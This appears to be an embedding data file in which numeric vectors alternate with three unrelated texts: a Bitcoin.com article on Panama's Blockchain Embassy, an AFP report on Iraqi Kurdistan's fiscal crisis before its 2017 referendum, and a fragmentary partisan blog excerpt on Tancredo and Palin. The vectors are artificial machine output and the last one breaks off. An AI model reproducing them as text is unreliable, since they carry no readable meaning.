0.05576266720890999, 0.12856042385101318, -0.04307373985648155, -0.08086219429969788, -0.04040084779262543, -0.03664427995681763, 0.07196130603551865, -0.05756030231714249, -0.047432515770196915, 0.037482041865587234, -0.05457722395658493, 0.07755254954099655, -0.03089367039501667, 0.02164650894701481, -0.009947439655661583, -0.04630374535918236, -0.05749748274683952, 0.03356907516717911, -0.03482597693800926, -0.09512849897146225, -0.021435489878058434, -0.045522548258304596, -0.11554758250713348, 0.018109630793333054, -0.021257054060697556, -0.09592568874359131, 0.010844267904758453, 0.024322746321558952, 0.07971788942813873, 0.04335377737879753, -0.003085225122049451, 0.038892921060323715, 0.08539780974388123, 0.007046808488667011, -0.001215637312270701, 0.02115112543106079, -0.006580996792763472, -0.0008215052075684071, -0.017701219767332077, 0.02275526523590088, -0.003145771101117134, -0.0525364987552166, 0.043131329119205475, 0.03895093500614166, -0.06734704226255417, -0.04015780985355377, -0.07980021834373474, -0.015131071209907532, -0.016374723985791206, -0.04834697023034096, 0.02788769267499447, -0.05348873883485794, -0.0448288731276989, -0.044505100697278976, -0.018222130835056305, -0.014723830856382847, 0.053199782967567444, -0.0569932796061039, 0.017525115981698036, -0.07999320328235626, -0.0033636330626904964, -0.020143212750554085, -0.027033384889364243, 0.03694015368819237, -0.03904189541935921, 0.10124616324901581, -0.011346590705215931, 0.036087766289711, 0.03007837012410164, 0.030778974294662476, -0.03737093508243561, -5.17566342310413e-33, -0.04713432863354683, -0.001756722223944962, -0.008974199183285236, -0.036607395857572556, -0.03177822008728981, 0.14905226230621338, -0.007494217716157436, 0.009558545425534248, -0.054124053567647934, -0.024198533967137337, 0.10345541685819626, -0.028563497588038445, -0.10896728187799454, 0.033484067767858505, -0.08528857678174973, 0.04178436100482941, 0.007305533159524202, 0.01930556818842888, 0.044245317578315735, -0.02930549345910549, 0.057576388120651245, 0.007550578564405441, -0.11487448960542679, 0.02887452207505703, -0.0003411570214666426, 0.054002922028303146, 0.07023807615041733, 0.08725658059120178, -0.06716537475585938, -0.021115027368068695, 0.021149450913071632, -0.06503836810588837, 0.05937561020255089, -0.051003750413656235, 0.03854072093963623, 0.0662318766117096, -0.0539356991648674, 0.13220000267028809, 0.002940036589279771, 0.07784873992204666, 0.04456429183483124, 0.0345100499689579, 0.01516733318567276, 0.08234857767820358, 0.028140993788838387, -0.014992184937000275, -0.005842460785061121, -0.07145582884550095, -0.04191063717007637, 0.017191912978887558, -0.02185448445379734, -0.04433729499578476, -0.032911092042922974, 0.05473921447992325, 0.033859558403491974, -0.012791525572538376, -0.05002528801560402, -0.02532762847840786, -0.028030501678586006, -0.0036376002244651318, -0.005079860333353281, 0.06188447028398514, -0.07642003148794174, 0.0851411297917366, 0.009318085387349129, 0.015814388170838356, -0.14553150534629822, -0.014793718233704567, -0.04431498050689697, -0.002487538382411003, -0.09956295043230057, 0.10351237654685974, 0.060295119881629944, 0.006427072454243898, 0.029622958973050117, 0.0748135969042778, -0.10380139201879501, 0.07262473553419113, -0.015685752034187317, -0.007698122877627611, -0.04219291731715202, -0.017054205760359764, -0.08277609199285507, 0.08313297480344772, 0.06584511697292328, -0.01177128590643406, 0.024222996085882187, 0.040975309908390045, 0.07112087309360504, -0.026726134121418, 0.0031722194980829954, -0.004276883788406849, 0.037417955696582794, 0.02990429848432541, 0.13201841711997986, -5.59783153164517e-8, -0.009351748041808605, -0.013457529246807098, -0.12030009180307388, 0.04254528880119324, -0.01059420220553875, -0.00825803168118, -0.0349278599023819, -0.041575491428375244, -0.10667277872562408, -0.010290322825312614, -0.03228894993662834, 0.051898807287216187, -0.006861419416964054, -0.02545345574617386, 0.05565961077809334, 0.05408654361963272, 0.008294297382235527, -0.04942825809121132, 0.02183711901307106, 0.03610881417989731, -0.023907342925667763, 0.03275622799992561, -0.07738207280635834, 0.05605417117476463, 0.05085556209087372, -0.002749210223555565, -0.03823826462030411, 0.022721964865922928, -0.062103625386953354, -0.03053673356771469, 0.017089614644646645, 0.029984354972839355, 0.03265974298119545, 0.016644064337015152, 0.016801299527287483, 0.07277964055538177, -0.014783911406993866, -0.053633756935596466, 0.05913292616605759, -0.035271015018224716, -0.03702091798186302, 0.047505300492048264, -0.021593870595097542, -0.035175472497940063, 0.004553721286356449, -0.03410201892256737, -0.04423120990395546, -0.07393400371074677, 0.030972357839345932, -0.004602702334523201, -0.030031098052859306, 0.0294182151556015, 0.018924085423350334, 0.07485124468803406, -0.009609908796846867, -0.03044208325445652, -0.060342784970998764, -0.04868445172905922, -0.07610205560922623, 0.0077904025092720985, 0.02370234951376915, -0.059690605849027634, -0.02877908945083618, 0.01432146318256855 ]
Blockchain Embassy Opens for Business in Panama City A new location for bitcoin and cryptocurrency enthusiasts, entrepreneurs, activists, iconoclasts, connoisseurs, and the general public has opened in Panama. It is called the Blockchain Embassy. It is located in the Balboa Boutiques Strip Mall of Balboa Avenue in Panama City. Also read: ICO Regulatory Round-Up: UK, Malaysia, and Switzerland’s Crypto Valley Point to Risks Information on the Blockchain Embassy The space has crypto clothing and other merchandise for sale. It has a cafeteria, craft beers for sale, hardware wallets on display, a coffee shop, and even a working space. A press release sent to bitcoin.com, said the embassy will also start giving cryptocurrency workshops and presentations. Everyone is welcome to come and engage with the Panama crypto community. The Embassy press release elaborated on how it accepts payment and provided more information: The embassy accepts payments in cash and Crypto, and has become an emblematic tourist site in Panama. It receives visitors from all over the world. It is one of the projects created by startup Cryptobuyer.io, known for being the first company in the world to install ATMs in commercial banks, as well as integrating its system Cryptobuyer Pay that allows any commerce to accept payments in Bitcoin and other currencies. Motivations to Build the Blockchain Embassy in Panama Bitcoin.com reached out to one of the founders of the Blockchain Embassy (and Cryptobuyer), Jorge Farias, to get some insight on the motivations behind setting up the embassy. He said, “We created the embassy because we were motivated by the need to educate the people not only of Panama, but also of the world. Panama is a tourist site, and at the same time, a major financial and logistic center. We believe that it is an ideal place to show the power of technology in a real, palpable way.” Furthermore, he said his company chose the site in Panama City because it is easy to access by car and it allowed his team to integrate all of its amenities. He said besides offering the Crypto ATM, hardware wallets, and all the amenities mentioned, they plan on gradually adding many more things for their customer’s enjoyment. What do you think about the Blockchain Embassy? Will you visit it? Let us know in the comments section below. Images courtesy of Blockchain Embassy At Bitcoin.com there’s a bunch of free helpful services. For instance, have you seen our Tools page? You can even lookup the exchange rate for a transaction in the past. Or calculate the value of your current holdings. Or create a paper wallet. And much more.
[ -0.04815385863184929, 0.0081796171143651, -0.07384995371103287, -0.01602235622704029, 0.05200835317373276, -0.11400347948074341, 0.0030773652251809835, 0.0035183788277208805, 0.053732696920633316, -0.01388718280941248, 0.024839291349053383, -0.05916411802172661, 0.009829927235841751, 0.05518068000674248, 0.08338101208209991, -0.00932314619421959, 0.01529205683618784, -0.006404287181794643, -0.002189605263993144, 0.001154691562987864, 0.05585740506649017, -0.08259224891662598, 0.02468634396791458, -0.0030398762319236994, -0.08300550282001495, 0.012453948147594929, 0.014984596520662308, -0.01637493073940277, -0.06289535760879517, 0.02832142636179924, 0.010301110334694386, 0.0538211315870285, 0.02870313823223114, 0.027711171656847, 0.05916663259267807, 0.0948302298784256, 0.08999545872211456, -0.06582386046648026, 0.051433611661195755, -0.025026999413967133, 0.030100395902991295, -0.05044375732541084, 0.0883588120341301, -0.05987473577260971, -0.007774820551276207, -0.06779374182224274, 0.11675628274679184, 0.027479322627186775, -0.0019851126708090305, -0.016266120597720146, 0.10241340845823288, -0.01525089144706726, 0.0019365192856639624, 0.026016628369688988, -0.09953124821186066, 0.036319758743047714, -0.03857443109154701, -0.07206594944000244, -0.0036821565590798855, -0.06617697328329086, 0.07007279992103577, 0.04417023807764053, -0.019154159352183342, 0.07136137038469315, 0.030421016737818718, 0.05327935144305229, 0.0323023721575737, 0.05695314705371857, -0.005405745003372431, -0.1197691410779953, 0.05464993417263031, -0.11003746837377548, -0.036794841289520264, 0.11782190948724747, 0.012580986134707928, -0.06875558942556381, 0.061540111899375916, 0.025748221203684807, -0.03506728261709213, -0.044920627027750015, 0.024407727643847466, -0.010198386386036873, 0.005710021127015352, -0.017431369051337242, -0.041438013315200806, 0.03309373930096626, -0.010515849106013775, 0.031279344111680984, 0.018414167687296867, 0.06125457584857941, 0.06398309022188187, 0.04827241227030754, -0.03592679649591446, -0.04932601749897003, 0.0115267438814044, -0.037461861968040466, 0.060466405004262924, 0.07007535547018051, -0.025630688294768333, 0.045986950397491455, 0.08140826225280762, 0.007243601139634848, 0.012339657172560692, -0.058450277894735336, 0.047696880996227264, 0.0642663761973381, -0.0360138863325119, 0.0013570780865848064, 0.038970135152339935, 0.09036779403686523, -0.10168566554784775, 0.01393144391477108, -0.037434305995702744, -0.025301575660705566, -0.03077705018222332, 0.08448465913534164, -0.035867463797330856, 0.01416024100035429, -0.03180302307009697, 0.05993751436471939, 0.032858818769454956, 0.004801081959158182, -0.004912782460451126, -0.09680961072444916, -0.06090546399354935, -0.017201989889144897, 0.0007375218556262553, 7.430764479158239e-34, -0.0739530399441719, 0.013655660673975945, 0.07711495459079742, -0.0036697490140795708, 0.04524354264140129, 0.027557268738746643, 0.008859650231897831, 0.049620725214481354, -0.06268971413373947, 0.02602684497833252, -0.06526381522417068, -0.07305381447076797, 0.04415453225374222, 0.046112414449453354, -0.016132889315485954, -0.0029320688918232918, -0.035852979868650436, -0.07020915299654007, 0.041835661977529526, 0.018860487267374992, 0.014707543887197971, -0.013413929380476475, 0.0636155903339386, 0.0037493447307497263, 0.06269121170043945, 0.08591149002313614, -0.008483469486236572, -0.007510318420827389, 0.0699029490351677, 0.041773125529289246, -0.03227398917078972, 0.021716265007853508, 0.024865353479981422, -0.06623712927103043, -0.010756619274616241, 0.03933224827051163, 0.05856770649552345, -0.05472484603524208, -0.013686755672097206, -0.04249342530965805, 0.0018614382715895772, -0.008603855967521667, -0.049452997744083405, 0.07468333095312119, 0.013019957579672337, 0.07445433735847473, 0.05335601046681404, -0.012577056884765625, 0.06522738188505173, 0.06688915193080902, 0.0077355061657726765, -0.021028444170951843, -0.12608908116817474, -0.03875770792365074, 0.018186816945672035, -0.09384002536535263, -0.049799662083387375, -0.008591427467763424, -0.0006180249038152397, -0.01774422451853752, 0.036284737288951874, -0.0108942287042737, -0.08787178248167038, 0.029235944151878357, -0.049531612545251846, 0.040346335619688034, -0.014817989431321621, -0.010235403664410114, 0.002222867915406823, -0.033008869737386703, -0.046378906816244125, -0.016896100714802742, 0.009266462177038193, 0.11875591427087784, 0.007894421927630901, 0.08109277486801147, -0.02804177813231945, 0.06192384287714958, 0.01190448459237814, 0.0276792049407959, -0.02966274879872799, 0.036078691482543945, 0.12253308296203613, 0.029457177966833115, -0.04484173655509949, 0.09901934862136841, 0.05723213776946068, -0.02369360439479351, -0.007286992855370045, -0.07172296941280365, 0.02819620817899704, 0.005137439351528883, 0.03350719437003136, 0.001180238206870854, 0.012313087470829487, -2.5767569017283883e-33, 0.008281036280095577, -0.13785187900066376, -0.0210171677172184, -0.050201836973428726, -0.02851242572069168, -0.01516417320817709, -0.0625198483467102, 0.025897903367877007, 0.020839091390371323, 0.009102871641516685, -0.013978643342852592, -0.06937554478645325, 0.11998855322599411, 0.017026256769895554, 0.08670885860919952, -0.013066237792372704, 0.04103280231356621, 0.030486637726426125, -0.00095826864708215, 0.06373560428619385, 0.0201466903090477, 0.0036523714661598206, -0.022809434682130814, -0.038844723254442215, -0.036188188940286636, -0.03391522541642189, -0.06330014020204544, -0.05751582607626915, 0.1358945071697235, -0.006592986639589071, -0.05468178540468216, 0.024760598316788673, -0.06000928208231926, 0.03158159554004669, -0.0704987421631813, 0.007785772439092398, -0.06725451350212097, -0.03950079530477524, 0.033086299896240234, -0.0057573444209992886, 0.0026201384607702494, -0.0029504026751965284, -0.07526751607656479, 0.012238810770213604, -0.09951676428318024, -0.054387111216783524, -0.05165998265147209, -0.0014791962457820773, -0.018015993759036064, -0.11988336592912674, 0.022858737036585808, 0.044236939400434494, 0.007036307826638222, -0.05073552206158638, 0.021059641614556313, 0.10045559704303741, -0.09973584860563278, 0.05854179710149765, 0.04836677759885788, -0.03969810903072357, -0.024542061612010002, 0.08201763778924942, -0.019584231078624725, 0.048231374472379684, 0.056187648326158524, 0.0200307946652174, -0.05992874130606651, 0.06777328997850418, -0.06802031397819519, -0.028626710176467896, 0.10246527940034866, -0.04472373053431511, -0.06347783654928207, -0.05246536806225777, -0.009148132987320423, -0.03847599774599075, 0.05612170323729515, -0.06778456270694733, -0.006115297321230173, 0.007909062318503857, -0.004563346970826387, 0.024652838706970215, -0.010068069212138653, -0.04525173455476761, 0.056852493435144424, -0.0037363292649388313, 0.05067466199398041, -0.055476587265729904, -0.014988795854151249, 0.003113118000328541, -0.08866244554519653, 0.005360497161746025, -0.0249843318015337, 0.0844210684299469, 0.004092642106115818, -4.5589438002480165e-8, -0.04272064194083214, -0.02328774705529213, -0.007733392529189587, 0.024810174480080605, -0.07129710912704468, 0.01726554147899151, -0.02034822851419449, 0.014466405846178532, -0.054735615849494934, 0.008476443588733673, 0.06160465255379677, -0.0019989446736872196, -0.11064665764570236, -0.014327197335660458, -0.11056161671876907, 0.10754944384098053, -0.09212279319763184, 0.06604141741991043, 0.017389096319675446, -0.025354446843266487, -0.03822372108697891, 0.02067485824227333, -0.020707037299871445, -0.11025349795818329, 0.03983427956700325, 0.01768854632973671, 0.003079179208725691, 0.08127496391534805, 0.03213847056031227, -0.018576551228761673, -0.09618670493364334, -0.0832926481962204, 0.021465618163347244, -0.03384021669626236, -0.01548397820442915, 0.041785143315792084, -0.07335616648197174, -0.0831284150481224, 0.0330166295170784, -0.012667943723499775, -0.0015934488037601113, -0.056349679827690125, 0.005781545769423246, -0.001182609237730503, 0.0014874471817165613, -0.04039524495601654, 0.021746782585978508, 0.015477017499506474, 0.017153676599264145, -0.01029178686439991, -0.06600378453731537, -0.08119615912437439, 0.06512986123561859, -0.037832483649253845, 0.04446624964475632, 0.03661472350358963, -0.03173215314745903, -0.04330261051654816, 0.037544798105955124, 0.09134677797555923, 0.004769535269588232, -0.05387396365404129, 0.041314058005809784, 0.0006086911307647824 ]
A referendum on independence for Iraqi Kurdistan set for September 25 c omes as the autonomous region faces the worst economic crisis in its short history. Plunging government income, the challenge of fighting the Islamic State group and the cost of hosting hundreds of thousands of refugees have combined to punch a gaping hole in the Kurdistan Regional Government's budget. "The KRG's coffers are empty and it's burdened with debts," Ruba Husari, an expert on Iraq's oil industry, told AFP. The World Bank said in a recent report that the fiscal crisis and the security challenge posed by IS "have had a significant adverse impact on economic growth". The region has benefitted from an influx of investment since the 2003 fall of dictator Saddam Hussein in a US-led invasion. It won a measure of autonomy in the 2005 Iraqi constitution and has been seen as an island of stability in a country plunged into anarchy. Iraqi Kurds take part in an event to urge people to vote in the upcoming independence referendum in Arbil, the capital of the autonomous Kurdish region of northern Iraq, on September 16, 2017 (photo by: SAFIN HAMED/AFP) The drowsy regional capital Arbil was transformed as investors built towers, plush buildings, shopping malls and hotels to host foreign executives on business trips. All that collapsed in 2014 as the price of oil plunged, IS jihadists seized a tranche of northern Iraq abutting the KRG and more than a million displaced Iraqis and Syrian refugees fled to the autonomous region. That was compounded by Baghdad's decision to suspend payments to the KRG of 17 percent of Iraq's national budget. The transfers, worth some $12 billion (10 billion euros), made up 80 percent of the region's budget revenues. Wages, including those of peshmerga fighters, were slashed. "The fiscal shock is severe," the World Bank said. It said the regional government has dealt with the cut in revenues by borrowing money, postponing projects, and delaying payments -- including the salaries of government employees. 'Dire economic situation' The combination of crises slashed GDP growth from eight percent in 2013 to three percent in 2014, the World Bank said in 2015. A senior KRG official said that by the end of that year, public servants' salaries had been cut by 60 percent. A building riddled with bullet holes is seen in the mainly Kurdish Iraqi city of Kirkuk on September 18, 2017 (photo by: AHMAD AL-RUBAYE/AFP) For the past two months, the region's 1.2 million civil servants and retirees have not been paid at all, he told AFP. Fathi al-Mudaress, an adviser to the KRG, said the crisis "stems from the fact that (the region) has made oil revenues its main source of income." "Two years into the crisis, the autonomous region's government has adopted policies of austerity and income diversification, notably through tourism, agriculture and industry," he told AFP. Kurdistan on average produces some 600,000 barrels a day, of which 550,000 are exported via Turkey. That includes some 250,000 from the oil fields of disputed Kirkuk province, seized by Kurdish forces when IS took control of Iraq's second city Mosul. The KRG sells oil through advance contracts, in effect taking out loans from firms including Swiss commodities giants Vitol and Glencore and repaying its debts with barrels of crude. The KRG has used this system to borrow more than $3 billion in the past three years. Recently it borrowed $1 billion from Russia's Rosneft to pay damages to European-Emirati consortium Pearl Petroleum, which is in a dispute with the regional government. Rosneft will also be paid in barrels of oil. But with oil prices still depressed, Kurdistan has been unable to pay investors developing its fields, and its debts are growing. The World Bank warned in 2016 that "arrears in payments to oil companies and contractors create an uncertain business environment". Husari said the crisis is much more severe than the Kurdistan government admits. "The obvious 'yes' result of the referendum will not lead automatically to a declaration of an independent state but will open battles on several fronts," she said. "For B arzani it's a leap forward to stay in power while diverting attention from the dire economic state of the region."
[ 0.06962639838457108, -0.03184042498469353, 0.03518684208393097, 0.016763534396886826, -0.02414494752883911, -0.0644831657409668, 0.003034367458894849, -0.020093616098165512, 0.006888996344059706, -0.018234016373753548, 0.00999592337757349, 0.002502854447811842, 0.02287338674068451, -0.09495007246732712, -0.002235566033050418, -0.003766064066439867, -0.03147789463400841, -0.10469081997871399, -0.008590971119701862, -0.0549342967569828, -0.02690497785806656, -0.08912939578294754, 0.002812814200296998, -0.038125909864902496, 0.052145954221487045, -0.006339812185615301, 0.0371486060321331, 0.011237552389502525, -0.008695656433701515, -0.07380539923906326, 0.07956378906965256, -0.06651700288057327, 0.03755803406238556, -0.060345035046339035, 0.06630348414182663, 0.12448284775018692, 0.06315287202596664, -0.022014213725924492, -0.037333160638809204, 0.003327932208776474, 0.06400441378355026, -0.11222678422927856, -0.053027838468551636, 0.006463402882218361, -0.017328888177871704, 0.03902985900640488, 0.047512609511613846, -0.03596784546971321, -0.010847194120287895, -0.04208613559603691, 0.08008450269699097, -0.02069307677447796, 0.01302663516253233, -0.08288309723138809, 0.018641987815499306, -0.06169138103723526, -0.026435794308781624, 0.0090421661734581, 0.04937819764018059, -0.027595514431595802, 0.01640419103205204, 0.06370598822832108, -0.00402040733024478, -0.020228950306773186, -0.00583798298612237, -0.044999346137046814, 0.19473455846309662, -0.07114168256521225, -0.004719175398349762, -0.006106697954237461, 0.07946818321943283, -0.009097571484744549, -0.043629370629787445, -0.05080484226346016, 0.006548852659761906, -0.059123799204826355, 0.018346458673477173, 0.03614549711346626, 0.05897047743201256, -0.01683281548321247, 0.041043721139431, 0.12077005952596664, 0.009258205071091652, -0.05995155870914459, -0.011487014591693878, -0.039808716624975204, -0.020772358402609825, -0.05272974073886871, 0.03898342326283455, -0.02626124769449234, -0.013973897323012352, -0.008728011511266232, 0.003604380413889885, -0.019311614334583282, 0.15544164180755615, -0.015572804026305676, 0.12164581567049026, -0.012717198580503464, -0.009190298616886139, 0.043360501527786255, 0.023168737068772316, 0.02394864149391651, -0.06510930508375168, -0.06472332775592804, 0.02366255410015583, -0.03669670969247818, -0.04954231530427933, -0.002760200062766671, -0.023879753425717354, -0.012501761317253113, -0.07713614404201508, -0.031355809420347214, 0.05598332732915878, 0.014830522239208221, 0.000551035103853792, -0.025153186172246933, -0.02726925164461136, -0.1280570775270462, 0.04431328922510147, 0.0403413362801075, -0.002341707469895482, -0.0072205401957035065, -0.07090562582015991, 0.1024637296795845, 0.04682616889476776, -0.05019022524356842, -0.026573598384857178, -1.3561395472108564e-33, 0.005243134219199419, -0.037700071930885315, -0.03156526759266853, -0.0020097773522138596, -0.11465093493461609, -0.02852684073150158, -0.0369361974298954, 0.046551816165447235, -0.1003771424293518, -0.009590759873390198, -0.02025304175913334, -0.0793662816286087, 0.02573169395327568, 0.027049481868743896, 0.11270005255937576, -0.03971664234995842, -0.03626721352338791, 0.05644034966826439, 0.03438461199402809, -0.015159654431045055, -0.03190210089087486, -0.007299051620066166, -0.0019437853479757905, 0.0049029020592570305, 0.053641434758901596, -0.025286739692091942, -0.006468798499554396, -0.027421392500400543, 0.0647410899400711, 0.010497276671230793, -0.04825403913855553, -0.02272331342101097, -0.0055248308926820755, -0.013634968549013138, -0.11962085217237473, -0.02061552368104458, -0.07017534971237183, 0.003844178980216384, -0.09970316290855408, 0.05053596943616867, 0.018169613555073738, 0.03639001026749611, 0.034230999648571014, -0.045420512557029724, 0.0887257307767868, 0.062078025192022324, 0.08327978849411011, -0.08407364785671234, -0.04527514800429344, -0.04729627072811127, 0.022163299843668938, 0.045584551990032196, 0.003377295332029462, -0.07862123847007751, -0.03605983778834343, -0.03263784945011139, -0.034345608204603195, -0.04004160687327385, -0.006020326167345047, 0.03852301463484764, 0.004153272602707148, 0.017258072271943092, 0.008922535926103592, 0.0077504045329988, -0.03399176895618439, -0.008159446530044079, -0.021969107910990715, 0.06927310675382614, 0.00883681420236826, 0.039273928850889206, -0.017194904386997223, -0.009749503806233406, 0.010969276539981365, 0.02537880837917328, -0.0981472060084343, 0.013699322007596493, -0.009120332077145576, -0.030558910220861435, -0.04729297757148743, 0.06000467762351036, 0.018353363499045372, -0.022484716027975082, 0.03915577381849289, -0.022221945226192474, 0.015318019315600395, 0.024023061618208885, 0.00856479536741972, -0.05874796211719513, -0.0754871517419815, -0.06687719374895096, -0.045565467327833176, 0.004361380822956562, -0.02224331721663475, -0.01599384844303131, 0.036719851195812225, -1.479627157310157e-33, 0.055089060217142105, -0.018809840083122253, -0.00486930925399065, -0.053435564041137695, 0.020068956539034843, 0.12404311448335648, 0.027019048109650612, 0.05581987649202347, -0.029911112040281296, 0.00553365983068943, -0.026020413264632225, -0.05474366247653961, 0.07848618179559708, 0.04655076563358307, -0.030349554494023323, 0.03366134688258171, -0.04441351443529129, -0.050404708832502365, 0.005445975344628096, 0.09320227801799774, -0.03234310820698738, 0.027341658249497414, -0.054628610610961914, 0.06313403695821762, 0.021089186891913414, 0.04781497269868851, -0.001699610147625208, -0.00978177785873413, -0.012654551304876804, 0.026672078296542168, 0.009001661092042923, -0.11551689356565475, -0.09717170149087906, 0.10371756553649902, 0.030389638617634773, 0.023887958377599716, -0.015404724515974522, -0.09078478813171387, -0.08675737679004669, 0.06040864810347557, 0.05724009498953819, 0.0169985331594944, 0.01522202417254448, 0.04081191122531891, -0.04245062544941902, 0.10759823769330978, 0.07672304660081863, 0.014655642211437225, 0.09957482665777206, -0.11043956130743027, 0.034094009548425674, 0.0433003231883049, -0.06598875671625137, 0.09923429042100906, -0.029006803408265114, 0.05081438645720482, -0.026942238211631775, 0.06805173307657242, 0.0018444121815264225, -0.013721374794840813, -0.08550633490085602, 0.03675847873091698, 0.07217781245708466, 0.019666414707899094, -0.009127034805715084, -0.0331006683409214, 0.012304425239562988, -0.048901431262493134, 0.08185498416423798, -0.005924929864704609, 0.024267612025141716, -0.035959336906671524, -0.06985785067081451, -0.05320470407605171, 0.07687944918870926, 0.08164070546627045, 0.0635070726275444, 0.05976615846157074, -0.060600828379392624, 0.03730553388595581, 0.04370938986539841, -0.00953506026417017, -0.055394865572452545, -0.016826575621962547, 0.031843364238739014, 0.06682437658309937, 0.03292066231369972, 0.009470393881201744, 0.03145747259259224, 0.05225565284490585, -0.02287544682621956, 0.006426219362765551, -0.06117462366819382, 0.046110473573207855, 0.03088667429983616, -5.268585567819173e-8, 0.07750076800584793, -0.0005739063490182161, -0.05043954774737358, 0.03908427432179451, -0.05706566199660301, -0.03273345157504082, 0.018911121413111687, -0.032210540026426315, -0.13757288455963135, 0.04938977211713791, 0.019822003319859505, 0.008387511596083641, -0.08100186288356781, -0.026444721966981888, -0.03580261021852493, 0.048949409276247025, -0.036134060472249985, 0.06281914561986923, 0.011782960966229439, -0.07417695969343185, -0.018420996144413948, -0.037361547350883484, -0.05376773700118065, 0.0316009558737278, -0.0043936846777796745, 0.06064845621585846, -0.001505186315625906, 0.026724517345428467, 0.04016575589776039, 0.037064746022224426, 0.04530039802193642, -0.020816612988710403, -0.08307088911533356, 0.030980294570326805, 0.03833948075771332, 0.018443401902914047, -0.030666399747133255, 0.04831267520785332, -0.0010343095054849982, -0.010692689567804337, 0.023259231820702553, 0.08107097446918488, 0.014745532535016537, -0.008035807870328426, -0.041645631194114685, 0.04754171893000603, -0.017084455117583275, -0.049059219658374786, 0.05666513368487358, -0.05138162896037102, -0.01928556151688099, -0.014398178085684776, -0.005422978196293116, 0.1257917881011963, 0.1437857300043106, -0.06586462259292603, -0.060446321964263916, -0.08315252512693405, -0.014625020325183868, 0.06709230691194534, 0.029481520876288414, -0.0312560610473156, -0.021880194544792175, -0.006875323131680489 ]
Bask in the cognitive dissonance: Enjoy the fragile ego: “Some within the establishment don’t like the fact that I won’t back down to a good-old-boys club. A lot of this has to do with control, power, money.” Watch the paranoid bonding: Just two years ago, Tom Tancredo was a veritable outcast of the Republican Party. Karl Rove was screaming at him, John McCain scoffed at him, GOP pollsters viewed him as a saboteur within their midst. Tancredo's one issue--a near-apocalyptic warning about immigrant-driven dilution of American culture--was seen as radioactive among the Republican elite. Ed Morrissey manages to spin all this as shrewd: This plays well for Palin. She gets to once again distance herself from the GOP party establishment while also adding to her reputation for political pragmatism. The Republican nominee, Dan Maes, is a disaster for Republicans, and most Republicans have already shifted support from Maes to Tancredo. We want to hear what you think about this article. Submit a letter to the editor or write to [email protected].
[ 0.01831183023750782, -0.035094503313302994, -0.012789103202521801, -0.03554859384894371, 0.008793485350906849, 0.09161864221096039, 0.0760662704706192, 0.024345995858311653, -0.020290005952119827, 0.00875120609998703, -0.00127736059948802, 0.06672951579093933, 0.03332271799445152, -0.06350576877593994, -0.0569472536444664, 0.10506980121135712, 0.02549702674150467, 0.030728977173566818, 0.010469842702150345, 0.14075322449207306, -0.07547435164451599, -0.05346252769231796, -0.013116271235048771, 0.05495082959532738, 0.044942520558834076, 0.03706938400864601, 0.0813194215297699, -0.09148997813463211, -0.17353782057762146, -0.024545341730117798, 0.0330793559551239, 0.004717857111245394, -0.03738867864012718, -0.012210807763040066, 0.009585096500813961, 0.014101347886025906, 0.05772232264280319, 0.013773969374597073, 0.0716528594493866, 0.0239707138389349, 0.022924894466996193, -0.09659671783447266, -0.01705246977508068, -0.025896193459630013, -0.021028222516179085, 0.008153297007083893, 0.005285700783133507, -0.02535770833492279, 0.050657082349061966, -0.07907979190349579, -0.019297337159514427, 0.006820521783083677, 0.07321383059024811, -0.0737549290060997, 0.0039237611927092075, 0.007196895312517881, 0.017582090571522713, 0.07803983986377716, -0.03643672168254852, 0.03358124941587448, 0.015410859137773514, 0.01812111958861351, 0.019509606063365936, -0.004215308465063572, 0.022741565480828285, 0.034788429737091064, -0.03679448366165161, 0.035795822739601135, -0.032388702034950256, 0.029470698907971382, 0.010471145622432232, 0.07469376176595688, -0.004427994601428509, -0.00889171939343214, 0.013129061087965965, -0.03183148056268692, 0.051564980298280716, 0.12341281026601791, 0.07499830424785614, -0.06227364391088486, 0.04744637385010719, 0.10394632816314697, -0.015283482149243355, -0.0736178606748581, 0.016510844230651855, -0.03712236508727074, -0.01033586822450161, -0.022265683859586716, 0.022629350423812866, -0.019674016162753105, -0.03896050900220871, 0.02097940631210804, -0.043728407472372055, -0.021940426900982857, 0.0718456581234932, -0.04634734243154526, -0.03477524593472481, 0.05639300122857094, -0.06029142439365387, 0.056592170149087906, -0.01955658383667469, 0.07602071762084961, -0.025031644850969315, -0.09240172058343887, -0.01758127100765705, -0.09533189237117767, 0.007941550575196743, -0.0223679281771183, 0.026979289948940277, -0.02898850478231907, -0.0027072876691818237, -0.02867409959435463, 0.05064501613378525, 0.01729196310043335, 0.0419406034052372, -0.010285764932632446, -0.0033143158070743084, -0.03356721252202988, -0.051730815321207047, 0.005810471251606941, 0.06308457255363464, -0.03532470762729645, -0.05730940401554108, 0.11579078435897827, 0.0567355714738369, -0.03209976479411125, -0.08000307530164719, 5.064258884740825e-33, 0.021020377054810524, 0.030315598472952843, -0.023609943687915802, 0.04192786663770676, -0.03518775850534439, 0.03086216375231743, -0.010290536098182201, -0.12656457722187042, -0.045995038002729416, -0.027894124388694763, -0.0471159927546978, 0.048151373863220215, -0.013326795771718025, 0.05024102330207825, -0.04934842884540558, 0.033715080469846725, -0.14227531850337982, 0.03334161639213562, -0.01095969881862402, -0.07619394361972809, -0.026710551232099533, 0.11568955332040787, -0.017814164981245995, -0.018617969006299973, -0.03392050042748451, -0.025808444246649742, 0.051773205399513245, 0.03792136162519455, -0.061575908213853836, 0.027386680245399475, -0.009975398890674114, 0.004075425677001476, 0.013239419087767601, 0.07552147656679153, 0.03923984616994858, -0.011718583293259144, -0.05190021172165871, -0.0260212030261755, -0.012203863821923733, -0.009187478572130203, -0.009613062255084515, 0.06606787443161011, 0.010911562480032444, 0.19143502414226532, 0.010576306842267513, 0.04398201406002045, 0.08637335896492004, 0.007154649123549461, -0.025769826024770737, -0.03140838071703911, 0.003011379623785615, 0.05004056915640831, 0.059620581567287445, 0.020513053983449936, -0.05235813185572624, -0.08680187910795212, -0.054976142942905426, -0.012687699869275093, -0.0191530492156744, -0.11304919421672821, 0.05230234935879707, 0.020298846065998077, -0.08424016833305359, -0.08694785088300705, -0.06755504757165909, 0.04419923946261406, -0.08856362104415894, -0.003914073575288057, 0.057740241289138794, -0.022836199030280113, 0.08738499879837036, -0.007234771735966206, -0.0693034678697586, 0.08923429995775223, -0.09043198823928833, -0.03429971635341644, 0.07717438042163849, -0.0360347144305706, 0.005657099653035402, -0.03769826516509056, -0.009582947939634323, -0.0496726855635643, 0.04935653135180473, -0.09658222645521164, -0.027474818751215935, 0.030897654592990875, 0.062159646302461624, -0.01161144208163023, 0.020901665091514587, 0.067985400557518, 0.012233703397214413, 0.05503053218126297, 0.00008117233664961532, -0.06647646427154541, -0.03466346859931946, 